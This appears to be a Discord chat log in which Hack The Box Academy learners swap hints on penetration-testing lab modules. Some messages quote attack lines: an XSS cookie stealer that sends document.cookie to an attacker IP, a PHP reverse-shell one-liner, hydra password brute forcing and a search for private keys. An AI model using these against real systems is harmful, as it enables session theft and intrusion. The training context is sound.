That's a user in the lab
the lab environment might not support mounting the drives
Got it
I was stubborn and just googled hard about how to mount it in linux
Guys i need help
with a module surely
Can yall teach me how to hack a discord server
Do I look like I care?
read the rules
This whole server isn't for that kind of stuff anyways. So piss off
Finally
hey
On the Upload skill assessment, did you have to figure out how to make the broken upload feature to work?
In my assessment, there is nothing happening after clicking on submit.
umm can you give me a screenshot of what you mean?
ok can i dm?
sure
thanks
hello, stuck on AD Enumeration & Attacks - Skills Assessment Part 2
question: Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.
been hunting for a while and don't seem to be getting anywhere, any hints/nudges?
what kind of attacks did you try so far?
secretsdump, snaffler, lazagne, shares enumeration, currently working through powerview
edit: also tried password spraying
||password spraying|| seems like a good idea
can I dm you?
if I remember there's a green button
my instance was completely broken had to restart my pwnbox.
But yes you remember correctly.
Ah sorry wasn't paying attention. I gotta go sleep, but I'll answer tomorrow if ya want
Hey. I'm just getting started and am in the HTTP Fundamentals module, and I have the following "question":
The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag.
I've found the request, but I don't know what header info the question is looking for. I've tried filename, initiator, method.
A flag usually has the format HTB{random_stuff_here}
I see. Thank you.
hello, for Active Directory Enumeration and Attacks skills assessment 2 - I'm struggling with the first question with finding a hash for a user. I've tried some techniques covered in the beginning of the module but had no luck. any tips?
try every technique
lol i wish i knew how to do spoilers to say what ive tried
either way, it's always worth trying everything that could be relevant. HTB loves to throw that one small paragraph where it offhand mentions something you can try at ya
that said for assessment 2 it's not one of those, it's one of the basic obvious things you should try first kind of stuff
so the first question wants us to find a hash for a user so that narrows down some of the techniques to try, at least in my eyes and i can't think of anything else i didn't try. unless i did something wrong
CBBH made me realize my note taking is bad and I need to visually map out everything. I 100% am doing this with CPTS material
its taking me way longer but hopefully stops me from making those misses like @thorn urchin is talking about
hey can i ask you for a nudge on Unrestricted File Upload skill assessment?
No worries, got past it on my own, a little stuck on the sql part but I'm gonna take a break for now, if I have trouble when I pick it up next I'll probably send you a message lol
BLIND SQL INJECTION - Skills Assessment : Anyone able to give me a hint to find the injection point? I tried sqlmap using the most aggressive settings, on everything, including the cookies and user agent.
Ok, so sqlmap is a bit strange. I had to force it to --dbms "Microsoft SQL Server"
Unrestricted File Upload Skill Assessment:
I have successfully bypassed the filters, the next challenge is to read upload.php. I have tried xxe via svg, but the only thing that I receive back is the base64 encoded payload that we sent.
Can someone give me a hint on what to do here?
I have already tried the xxe payload with php filters.
Currently stuck on the Broken Authentication module - Weak Bruteforce Protections section - on question 2. I've tried using the X-Forwarded-For header and inserting the ||target's ip, server name, and the php/x.x.xx|| but with 0 luck. Used Burp, curl, and even hydra. Any help would be appreciated!
Looking to see if I took notes on this one,
Can you please help me with last question of AD Enum & attacks Part 1, I DMed you
There's just a handful of techniques that allow you to get hashes with no account compromise.
@low vine fs lmk
Assuming, you've tried that too. I think I might have a clue where you might have gone wrong in that but, yeah
@lavish needle I reformatted all my notes, don't have individual questions / methodologies in here anymore
@low vine haha no worries bro thx anyways!
Mounting that share took me longer than all of the module
That's what I ended up doing as well
Have a NUC at home i rdp into
Made a kali vm and used a shared folder
I'd like to give a big shoutout to @acoustic owl . He is truly outstanding - incredibly helpful and incredibly kind. He is very helpful and I am grateful for his help.
@acoustic owl , he is a great big bro!
hello, in the linux privilege escalation room, cron job abuse room, i found the file which can be edited and runs a cronjob. but where do i find, how that particular cronjob is scheduled?
oh i got it, thanks
thanks!!
@round gale
and this link for linux command explaining, it's good for you, bro
https://explainshell.com/
match command-line arguments to their help text
@round gale and Local Privilege binaries for Linux here
https://gtfobins.github.io/
and windows here
https://lolbas-project.github.io/#
any further tips on this? Tried running it prior to setting breakpoint and still get the same errors you posted above.
Hello im in module Paswords attacks lab-medium i have 2 users ja---- and de--- but i cannot do the privesc somebody can help me?
dw got it now
somebody can help with passwords attacks lab-medium please?
Have a look at the files of user de..... If you look closely, you will find an interesting file, which, how could it be otherwise, you have to crack first.
use the User dexxx
That's an awesome hint. well done
I must be doing something wrong then. I tried different techniques and tools
Make sure you're aware of the network you're in.
i don't know what file i have to find
Anyone could help me
Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. Performed dig on all subdomains (dig any @white rock subdomains), used subbrute on inlanefreight.htb, and whenever I try to do an AXFR transfer it fails. Tried adding subdomains to my hosts file as well but it still doesn't work
Usually, there are two ways to authenticate as a user
a password or an id_rsa
So you zone transferred inlanefreight.htb and then subbrute on the subdomains?
yes
ANY is not the best idea
https://blog.cloudflare.com/deprecating-dns-any-meta-query-type/
And where did your zone transfer fail?
; <<>> DiG 9.18.12-1-Debian <<>> axfr inlanefreight.htb @10.129.203.6
;; global options: +cmd
; Transfer failed.
Have you ever looked if this file exists?
Now I wish I had notes on this but I thought that zone transfer should work. I'll check in a minute
Remember that you can configure zones to allow zonetransfer only from certain servers.
i searched with grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1" and with find / -name *id_rsa* 2>/dev/null but there is only the id_rsa of the dexxx user
Afaik any is taught in the module. Might wanna write an erratum
What do you expect from adding a subdomain to your hostsfile?
What exactly does the hosts file do?
ANY can work, but depends on the configuration
Fair
are you sure?
Private keys in the .ssh directory are usually used to log in as another user somewhere. Right?
did someone complete the Documentation & Reporting skills assessment??
Currently, 390 people have completed this module.
got it!
very small group of people actually
this must be something medium considering the skills assessment, it is not easy tho
There are modules where there are even fewer people
I am guessing it is AD & Password attacks
how do you see how many users have a badge?
Broken Auth in CBBH path made me want to cry
Note taking is important. taking good notes has helped me a lot already so I will definitely take this module
this module is freaking me out, can you give another hint, I feel like useless shit but anyway I have to complete it
just tested. looks good and should work
AD Enum & Attacks 652
Password Attacks: 982
not much either
If you want to share the badge, you will get a link. Open it
Whats the total on CPTS passes so far is it still under 100?
It is actually good to know how many CPTS certs are earned so far
is there any source to check it?
I gotta get the CPTS next, feel very behind on AD / my AD abilities
Crying does not help
I shed tears it took me like 4 days of throwing a tantrum
can you give a hint on the skills assessment pls, Documentation & Reporting, three days straight in a row, and not anything out of it
Sure, send me a DM
can you do this with CBBH?
I was trying to find it i only see the cert
No, only with the Badges
got it
^ i'm looking now, where do you find that one?
not quite, click on "Get a shareable link" below the buttons
solid thanks
157
If you tell us here what brings tears to your eyes or gives you tantrums, we might be able to help you.
Well when I walk back through that modules and relive that pain I'll come here
but for now.......we not back on it yet
Do we get a live ticker then?
The numbers of the badges are not live numbers. No idea how often the numbers are adjusted. Once a day?
can you check your dm pls
nah I meant for when Roll For Combat relives his pain
I know that it doesn't update that often
Ill have to look at CPTS path hold up
cause i feel like ive lost it all lol I'd say 1.5 months
it says unable to send msgs btw, I guess because you set some certain rules
I have received your message.
Can someone help me with:
- Web Attacks: Blind Data Exfiltration (XXE)
I currently have this, but it is not giving me any response...
Sure.. let's make it simple.. DM's pls
What is in the index.php file?
Port 8000 on your machine
Oh, Simple was faster
The php they provide in the section
is your php server started in the same directory as the xxe.dtd file, and does it include the index.php
^
Got it !
Does anybody have a recommended resource to keep learning about Active Directory after doing the "Introduction to Active Directory" module?
That module left me with more questions than answers
I am on the getting started module trying to run an nmap scan on the web server in the Public Exploits section. It comes back saying the host is down. Is this correct??
good morning friends. at Password Attacks Lab - Medium can i get a hint how to interact with the service on the host, since the port is closed i can't use hydra and i don't think i can use http://localhost:####/
maybe http://targetip/####/ ?
i tried that, let me check again
i can't recall a step that has http in it for that lab
Are you connected to the VPN?
it didnt work
its not http, but another service in the doc file
if the port is not up, then you are looking at the wrong thing
there is something that stands out and can be used
it's not working. i am already at the j****** user, i searched for everything, history, conf files, scripts and nothing there, so i am almost sure it's something else in the document, but the service mentioned there is not running
Maybe you need to access the service locally
i already did it but was using uppercase, it's always the simple mistakes
thank you so much
question before I dive into the rabbit hole do I need to get a windows virtual machine to mount the drive on password attacks - hard
nvm found info
Hi, I'm a student in HTB Academy. I'm wondering if it's important to subscribe to HTB Labs or machines to improve my skills when I finish a module, or to wait until I finish the CPTS path?
Get the subscription once you have got to the 'nibbles' part of the second module
so I'm late. I will activate my subscription and start with machines that include the subject of the module we finish
password attacks - hard down was a great machine did not enjoy the curve ball I got thrown at the end though haha
Module: PIVOTING, TUNNELING, AND PORT FORWARDING
Section: RDP and SOCKS Tunneling with SocksOverRDP
https://academy.hackthebox.com/module/158/section/1439
I have been able to set up port forwarding from the attacker host to the pivot host then to victor's host, but when I tried to connect to jason's host the connection always reset. The hint says that jason is a local user and there might be a defender. Any hint to bypass the defender?
Would someone be able to provide me a sanity check or a nudge for: Web-Attacks, Blind Data Exfiltration? I'm able to get the server to request the DTD I'm hosting, however, I can never get the flag contents. I've also tried to get the contents from /etc/passwd, but can't get that to dump either. I've cross checked what I'm doing with portswigger and a few other write-ups on OOB-XXE and I'm not sure what I'm doing wrong at this point
it depends on you, and the prolabs on HTB are super good for learning AD (no idea about web stuff if that's what you're looking for)
i don't think there is defender on jason box but there is on victor and you can just disable that
hint ||base64|| or if you've already done that and still need help shoot me a dm
anyone familiar what service i should use ? https://academy.hackthebox.com/module/112/section/1078
floofd?
yes?
can u help ?
uhhh, I was just about to ask for help myself (session hijacking chapter in the xss module, the server connects but the cookie it submits is always empty), what is the problem?
When I click on the link myself I do indeed get a cookie in the output of the PHP server, just that it's my own cookie
well run nmap and look around. something should stand out
then it should work theoretically
||10.129.59.218:48226 [200]: GET /index.php?c=
||
that is what I get when the Server "clicks" on the link
||10.10.14.170:48328 [200]: GET /index.php?c=abcPHPSESSID=ipobk3ea8mt9hmm05jp3f||
and that is what it looks like when I do it
the 'abc' in the front is just because i wanted to see if it would show anything at all, that's why I added it in the script.js
so you're hosting some kind of cookie stealer and it does load it but something breaks?
like what?
ftp?
i logged in ftp
but what next
like put the public key inside?
Yes, it is a reflected XSS attack, with a bot that is supposed to click on any link you send it, then it tries to load an image, which makes the victim load a script.js from my IP, which in turn does this ||new Image().src='http://10.10.14.XXX:80/index.php?c='+document.cookie;|| - which creates a GET request on a PHP server I host, with the cookie as a parameter
But it only works when I click on the link, when the bot does it just prompts an empty parameter aka cookie...I am wondering if I am somehow supposed to make the bot login first, so that it has a cookie to begin with, but I have no idea how I am supposed to do that
I don't know the module out of the top of my head, but is there a ssh private key somewhere on the ftp server maybe?
payload does seem fine. not sure why it's partially URL encoded but that should work nonetheless
i tried to find it but nope nothing
@heady tusk if u have finished it please give me tips
i hate being stuck in a module
no need to do that. might be worthwhile to restart the machine and see if the bot is broken
the private key guess seems pretty accurate
that was my idea too, but doing so 2 times didn't change anything :/
hmm then give me some more detailed steps of what you did, which payloads you used, etc. Maybe I can spot something
Hi @acoustic owl . I am on the medium lab in the footprinting module. I successfully found the credentials in the NFS share, In addition was able to login to the RDP server. However I am unsure what to do next. I tried to use the details to log into the email server but connection was refused. I tried to log into the sql server on the rdp but this was not successful. In addition, I tried to login remotely (see terminal) but this was also unsuccessful. It seems like I have gone down a rabbit hole. Would you be able to guide me in the right direction or give me a hint? Thanks.
has anyone done Attacking Thick Client Applications?? I got big trouble with it I cannot catch a process with procmon, so basically at the beginning of it, how did you guys manage to complete it that's mad
You still need to look around a bit more. if one user can't access what you're looking for, maybe try to find another π
sure
has anyone done Attacking Thick Client Applications?? I got big trouble with it I cannot catch a process with procmon, so basically at the beginning of it, how did you guys manage to complete it that's mad
did you complete this? I am stuck at the beginning
attacking common services easy lab.
with an nmap scan i found there is an ftp server up, medusa is extremely slow and hydra completely breaks if i try to use it with more than 1 thread so i cannot attack the ftp server, i specifically get this error code: ||[ERROR] Not an FTP protocol or service shutdown: 550 Too many connections, please try later...||
there is an smtp server too, i tried smtp-user-enum and found a user named ||fiona|| with their email, i tried brute forcing their password with this command: ||hydra -l fiona -P Downloads/pws.list -f 10.129.52.79 pop3|| after a few seconds it gets stuck here: || [DATA] attacking pop3://10.129.52.79:110/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
C
there is an sql db too but its completely useless to me without creds.
may i please have some help?
idea seems good. hydra doesn't give much output so it may appear stuck while actually doing work
I hate Attacking Thick Client Applications, it doesn't work fvck
Where are you stuck?
the "C" was generated automatically, when i press enter it completely closes
at the beginning
use filters to get what you want on procmon
ugh what? hard to tell what the issue is from that output, but googling the error messages often helps
Question: does your rank or level automatically update when you rank up on the website? Wasn't sure where to ask this question
i noticed that it tries to attack port 110 while the smtp server is on port 587, the attacking smtp module only had this command regarding attacking, how can i tell hydra to attack port 587? google did not help either
does not make sense
how that filter is used
keep running hydra on the fiona user, when I did the module I was annoyed that the passwordlist in the resources didn't work but I got an almost instant hit with rockyou.txt
like man there is no description how to use that how am I supposed to get it
you're currently attacking pop3. you can simply change that to smtp
I'm at the Getting Started module, at the Knowledge Check.
I have the user flag. the root is left.
I know because sudo -l ||(ALL : ALL) NOPASSWD: /usr/bin/php||
I try to add the ||/usr/bin/php a shell|| but it doesn't work.
Is this the right way?
because I don't find a kernel exploit and I don't think they try to hide some exploit in a program.
What other way is there? How can I exploit ||/usr/bin/php||? I can't find it on Google.
You're supposed to figure it out lol
ok smart kid
Give it a few try and if you still can't find it, you can DM
what is his doubt
.
dont they show u the page gtfobins in the module?
and on top of it I keep getting this error: The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.
'c:\programdata\restart-service.exe' is not recognized as an internal or external command,
operable program or batch file.
Could Not Find c:\programdata\restart-service.exe
like bro, u better kill me...
5-6 time I am resetting the instance
can be true
but i try ||php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'|| and get only a normal user shell not a root
why u doing that
u have this right
i know i try to get root
i found out || (ALL : ALL) NOPASSWD: /usr/bin/php|| and if i understand right i can manipulate this to give me root rights, or am i wrong
yea
an that is to get a reverse shell btw
but does it give a reverse shell with root rights?
I did get it guys
what I was doing before was right, but I got this error multiple times: c:\programdata\restart-service.exe' is not recognized as an internal or external command
can you help me pls bro
I set the right parameters for procmon, so I now can see where the .bat file is being saved, but I am getting this stuff: c:\programdata\restart-service.exe' is not recognized as an internal or external command
i think u dont know what this means
how did you solve it bro
I have a question about 'Pivoting, Tunneling, And Port Forwarding' module
Section 'Dynamic Port Forwarding with SSH and SOCKS Tunneling'
Dynamic forwarding through SSH, in the SSH command it was shown:
Konafa@htb[/htb]$ ssh -D 9050 ubuntu@10.129.202.64
And in proxychains.conf they added the entry:
Konafa@htb[/htb]$ tail -4 /etc/proxychains.conf
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
Isn't it supposed to be socks4 <victim_IP> 9050 not 127.0.0.1?
No, this is correct for how the SSH proxy works. It doesn't open it remotely, but locally, and pipes your traffic through the SSH connection.
This is actually a benefit, since no additional ports need to be opened on the victim.
Oh I see, so the server and the client are both on my machine, socks server on 9050 and client whatever tool sends TCP packets through proxychains, and the same time the victim machine doesn't spin up any listeners
I see, thank you so much
why are u silent now?
What exactly
sudo -l
Module: Kerberos Attacks
Section: Unconstrained Delegation - Users
not sure what Im doing wrong
I have added spn using this for user callum.dixon
python addspn.py -u inlanefreight.local\\carole.rose -p jasmine --target-type samname -t callum.dixon -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local
Now how am i supposed to receive the TGT?
I don't have the hash for the compromised target. I have only the password, I tried with that but I didn't receive any TGT
guys
Pls help me like what is this
I cannot move on
I'm stuck here for a few days
Convert the password to its NTLM hash equivalent.
getting this error with secrets dump
DM me.
Hello everyone! I need some help... I am stuck on the session: Value Fuzzing of the ATTACKING WEB APPLICATIONS WITH FFUF module. I am getting the same results for all 1,000 IDs:
[Status: 403, Size: 334030, Words: 114, Lines: 113, Duration: 29ms]
Can someone assist?
What exactly have you tried? Which parameter are you trying to fuzz?
I hadn't seen this +
.
Ok, now you're claiming that I somehow offended you; I just gave a simple compliment, bro
Can you send the link to the module? And what are you trying?
It doesn't offend because you didn't say it to me
here is the link
https://academy.hackthebox.com/module/54/section/505
But if you don't respect a guy who is helping you, why should I help you?
being a dick is a terrible way to get help
I am trying to Fuzz the ID for the user:
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:31125/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded'
Did you create the wordlist with the IDs?
good luck figuring things out on your own
Yes I did. 1,000
You're missing the -fs
to filter
I have tried with the -fs and without
they are all the same results
I think that one was with -ms but not sure right now
[Status: 403, Size: 334030, Words: 114, Lines: 113, Duration: 24ms]
I said that I already did
But I keep getting that error; it is not happening because of it. Why are you playing "so smart" yet you haven't read the messages?
anyway thanks
is that page authenticated?
I feel like admin/admin.php?id=n is authenticated? Then you'd need to provide the session cookies
It doesn't mention anything about authentication in the module
Did you authenticate tho?
No... how?
Hello colleagues, I am finishing the Security Fundamentals course. I would like to know how I can start practicing in the labs according to what I learned.
Ah, if it's not authenticated then it's something else lol.
It looked like a request that you fetched after you logged into the application. Not the case I see
Send what output you get
I tried the same command on HTB Pwnbox and worked. For some reason is not working on the Parrot HTB VM I usually use. The VPN is setup correctly and working.
Thanks
Has someone completed this? Not sure if I used the intended way
This here is really confusing, it comes from the NoSQL module. Why all of a sudden can we name a parameter that way? I really wish there was more details around that because I've never seen anything like that before. Usually payloads go inside the value of the parameter, and so I'm not even sure how the parameter name itself can be tampered with and still work
not equal
It's specifically because of how Node.js works
Ok, I'll have to brush up on how it works because it's so confusing to see a parameter like that
It's all strings in the end, and how they get parsed
The not equal part makes sense, but the fact that it's not in the value, but within the parameter name itself confuses me
It is about the coding, if I'm right
There's nothing special that makes a parameter name different from the value other than how the backend processes it
